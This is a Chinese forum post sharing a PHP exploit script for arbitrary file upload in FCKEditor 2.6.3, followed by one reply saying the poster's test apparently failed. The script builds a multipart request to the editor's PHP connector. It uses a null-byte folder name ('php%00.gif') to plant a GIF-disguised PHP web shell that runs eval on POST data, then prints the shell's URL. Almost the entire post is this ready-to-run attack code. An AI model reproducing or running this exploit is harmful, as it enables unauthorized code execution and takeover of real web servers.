Fckeditor 2.6.3 漏洞 EXP

admin

1. <?
   
2. 
   
3. 
   
4. 
   
5. 
   
6. 
   
7. error_reporting(0);
   
8. 
   
9. set_time_limit(0);
   
10. 
    
11. ini_set("default_socket_timeout", 5);
    
12. 
    
13. 
    
14. 
    
15. define(STDIN, fopen("php://stdin", "r"));
    
16. 
    
17. $match = array();
    
18. 
    
19. 
    
20. 
    
21. function http_send($host, $packet)
    
22. 
    
23. {
    
24. 
    
25.         $sock = fsockopen($host, 80);
    
26. 
    
27.         while (!$sock)
    
28. 
    
29.         {
    
30. 
    
31.                 print "\n[-] No response from {$host}:80 Trying again...";
    
32. 
    
33.                 $sock = fsockopen($host, 80);
    
34. 
    
35.         }
    
36. 
    
37.         fputs($sock, $packet);
    
38. 
    
39.         while (!feof($sock)) $resp .= fread($sock, 1024);
    
40. 
    
41.         fclose($sock);
    
42. 
    
43.         print $resp;
    
44. 
    
45.         return $resp;
    
46. 
    
47. }
    
48. 
    
49. 
    
50. 
    
51. function connector_response($html)
    
52. 
    
53. {
    
54. 
    
55.         global $match;
    
56. 
    
57.         return (preg_match("/OnUploadCompleted\((\d),"(.*)"\)/", $html, $match) && in_array($match[1], array(0, 201)));
    
58. 
    
59. }
    
60. 
    
61. 
    
62. 
    
63. print "\n+------------------------------------------------------------------+";
    
64. 
    
65. print "\n| FCKEditor Servelet Arbitrary File Upload Exploit by Wolegequ     |";
    
66. 
    
67. print "\n+------------------------------------------------------------------+\n";
    
68. 
    
69. 
    
70. 
    
71. if ($argc < 3)
    
72. 
    
73. {
    
74. 
    
75.         print "\nUsage......: php $argv[0] host path\n";
    
76. 
    
77.         print "\nExample....: php $argv[0] localhost /\n";
    
78. 
    
79.         print "\nExample....: php $argv[0] localhost /FCKEditor/\n";
    
80. 
    
81. 
    
82. 
    
83.         die();
    
84. 
    
85. }
    
86. 
    
87. 
    
88. 
    
89. $host = $argv[1];
    
90. 
    
91. $path = ereg_replace("(/){2,}", "/", $argv[2]);
    
92. 
    
93. 
    
94. 
    
95. $filename  = "fvck.gif";
    
96. 
    
97. $foldername = "fuck.php%00.gif";
    
98. 
    
99. $connector = "editor/filemanager/connectors/php/connector.php";
    
100. 
     
101. 
     
102. 
     
103. 
     
104. 
     
105. $payload  = "-----------------------------265001916915724\r\n";
     
106. 
     
107. $payload .= "Content-Disposition: form-data; name="NewFile"; filename="{$filename}"\r\n";
     
108. 
     
109. $payload .= "Content-Type:  image/jpeg\r\n\r\n";
     
110. 
     
111. $payload .= 'GIF89a'."\r\n".'<?php eval($_POST[a]) ?>'."\n";
     
112. 
     
113. $payload .= "-----------------------------265001916915724--\r\n";
     
114. 
     
115. 
     
116. 
     
117. $packet         = "POST {$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder=".$foldername." HTTP/1.0\r\n";
     
118. 
     
119. //print $packet;
     
120. 
     
121. $packet        .= "Host: {$host}\r\n";
     
122. 
     
123. 
     
124. 
     
125. $packet .= "Content-Type: multipart/form-data; boundary=---------------------------265001916915724\r\n";
     
126. 
     
127. $packet .= "Content-Length: ".strlen($payload)."\r\n";
     
128. 
     
129. $packet .= "Connection: close\r\n\r\n";
     
130. 
     
131. $packet .= $payload;
     
132. 
     
133. 
     
134. 
     
135. print $packet;
     
136. 
     
137. 
     
138. 
     
139. if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
     
140. 
     
141. else print "\n[-] Job done! try http://${host}/$match[2] \n";
     
142. 
     
143. 
     
144. 
     
145. 
     
146. 
     
147. ?>

复制代码

张真人

已测试，好像并不可以用，也不知道是不是我姿势不正确，还是说里面的代码需要做更改